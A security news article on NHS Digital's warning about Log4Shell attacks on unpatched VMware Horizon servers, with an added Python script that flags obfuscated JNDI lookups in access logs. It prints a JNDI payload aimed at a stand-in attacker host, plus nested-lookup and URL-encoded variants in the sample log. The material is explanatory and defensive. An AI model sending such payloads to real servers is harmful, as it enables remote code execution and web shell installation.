UK health service warns of attacks on VMware Horizon servers using Log4Shell

news

NHS Digital, the technology arm of the UK’s National Health Service (NHS), has warned of ongoing attacks against VMware Horizon servers.

Source: “Log4Shell Vulnerabilities in VMware Horizon Targeted to Install Web Shells” - NHS Digital

Attackers are actively exploiting the Log4Shell vulnerability in VMware Horizon servers in order to install web shells.

In its security alert, NHS Digital said: “This Log4Shell appears to be being used by attackers to perform a number of malicious activities, including deploying additional malicious software, exfiltrating data, and deploying ransomware.”

In December 2021, the Conti ransomware group was reported to be exploiting Log4Shell to compromise VMware vCenter servers, so this is the second reported campaign to target VMware products through the Log4Shell vulnerability.

What is Log4Shell?

Log4Shell (CVE-2021-44228), disclosed on December 9, 2021, is a vulnerability in Apache Log4j, a widely used Java library that adds logging capabilities to Java web and desktop applications.

The flaw was reported privately to Apache in late November 2021 by Alibaba Cloud’s security team. It became public knowledge when it was found that Minecraft servers, which use Log4j for logging, could be hijacked by sending a chat message containing a lookup string of the following form, which Log4j evaluates when it logs the message:

${jndi:ldap://attacker.com/malicious_script}

Apache has released fixed Log4j versions (2.15.0, followed by 2.16.0 and 2.17.0 as further issues were found), and VMware is one of the vendors that has integrated the Log4j fixes into its products so that they cannot be trivially compromised with the Log4Shell exploit.

VMware Horizon, a platform for deploying and managing virtual desktops for enterprise staff, was one of several affected VMware products that received patches against Log4Shell.

NHS Digital discovers Log4Shell attacks on VMware Horizon servers

However, NHS Digital says it has identified attacks that scan for VMware Horizon servers that remain unpatched, despite the fixes being available.

According to the NHS Digital security team, the attack follows the pattern of the early Log4Shell exploit described above: the attacker sends a request containing a JNDI lookup string to the VMware Horizon server, which then logs it through Log4j.

If the server is unpatched, Log4j evaluates the lookup, causing the Horizon server to connect to the attacker’s domain over LDAP and then download and execute a PowerShell script that installs a web shell. That web shell acts as a backdoor for follow-on activity.
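The following Python script is an added example, not code from the NHS Digital advisory or from VMware. It shows how the lookup string described in the "What is Log4Shell?" section, and the request stage of the attack pattern described just above, can be spotted in a web server access log. It goes beyond the plain ${jndi:ldap://...} form shown in the article and also collapses the nested-lookup and URL-encoded obfuscations seen in the wild (the handled forms ${lower:x}, ${upper:x}, ${::-x} and ${env:NOTEXIST:-x} are the author's assumption about what to cover). The log lines, hostnames and IP addresses are constructed for the example.

```python
"""Flag Log4Shell-style JNDI lookups in web server access log lines.

Added example, not code from the NHS Digital advisory or from VMware.
The obfuscation forms handled here are assumptions about common in-the-wild
payloads; the log lines at the bottom are constructed, not real traffic.
"""
import re
import urllib.parse
from typing import Dict, List, Optional

# An innermost Log4j lookup: ${...} whose body contains no further ${ or }.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# A de-obfuscated JNDI lookup: ${jndi:<scheme>:<target>}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*([^}]*)\}", re.IGNORECASE)


def _resolve_inner(body: str) -> Optional[str]:
    """Collapse one innermost lookup to the literal Log4j would substitute.

    ${lower:J} / ${upper:j}  -> case-changed value
    ${::-j}                  -> empty lookup whose default value is 'j'
    ${env:NOTEXIST:-j}       -> missing variable whose default value is 'j'
    The jndi lookup itself, and anything unrecognised, returns None and is kept.
    """
    prefix, sep, value = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "jndi":
        return None            # never collapse the lookup we want to detect
    if ":-" in body:
        return body.split(":-", 1)[1]   # default-value operator
    if sep and prefix == "lower":
        return value.lower()
    if sep and prefix == "upper":
        return value.upper()
    return None


def normalize(text: str, max_rounds: int = 32) -> str:
    """URL-decode, then collapse nested lookups from the inside out until stable."""
    for _ in range(2):   # payloads are sometimes double-encoded
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded

    def repl(match) -> str:
        resolved = _resolve_inner(match.group(1))
        return match.group(0) if resolved is None else resolved

    for _ in range(max_rounds):
        collapsed = _INNER.sub(repl, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def detect(line: str) -> Optional[Dict[str, str]]:
    """Return details of a JNDI lookup found anywhere in the line, or None."""
    match = _JNDI.search(normalize(line))
    if not match:
        return None
    return {
        "src": line.split(" ", 1)[0],       # client IP is the first access-log field
        "scheme": match.group(1).lower(),   # ldap, ldaps, rmi, dns, ...
        "target": match.group(2).strip(),
    }


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run detect() over every line and keep the hits."""
    return [hit for hit in (detect(line) for line in lines) if hit]


# Constructed Tomcat-style access log lines (hypothetical hosts and addresses).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2022:08:12:01 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    # plain payload in the User-Agent, the form shown in the article
    '203.0.113.7 - - [10/Jan/2022:08:12:02 +0000] "GET /portal/ HTTP/1.1" 200 15 "-" "${jndi:ldap://attacker.com/malicious_script}"',
    # same thing hidden behind nested lookups
    '203.0.113.7 - - [10/Jan/2022:08:12:03 +0000] "GET /portal/ HTTP/1.1" 200 15 "-" "${${lower:j}${upper:n}${::-d}${env:NOTEXIST:-i}:${lower:LDAP}://203.0.113.7:1389/o}"',
    # URL-encoded in the query string, using the RMI scheme
    '203.0.113.7 - - [10/Jan/2022:08:12:04 +0000] "GET /portal/?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%3A1099%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['src']} -> {hit['scheme']}:{hit['target']}")
```

The normalisation step is the point of the example: matching on the literal text "${jndi:" misses the second and fourth lines, which Log4j would still evaluate exactly like the first. Note that this only covers the request stage, and only for requests that reached the access log; the LDAP callback and the PowerShell and web shell activity that follow happen on the host, which is where the detection guidance NHS Digital has published applies.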

To help organizations running VMware Horizon, NHS Digital has published guidance on how to detect signs of this activity.

That guidance is in the NHS Digital technical report and is not reproduced here, because NHS Digital may revise its detection advice over time; readers should consult the original alert for the current version.
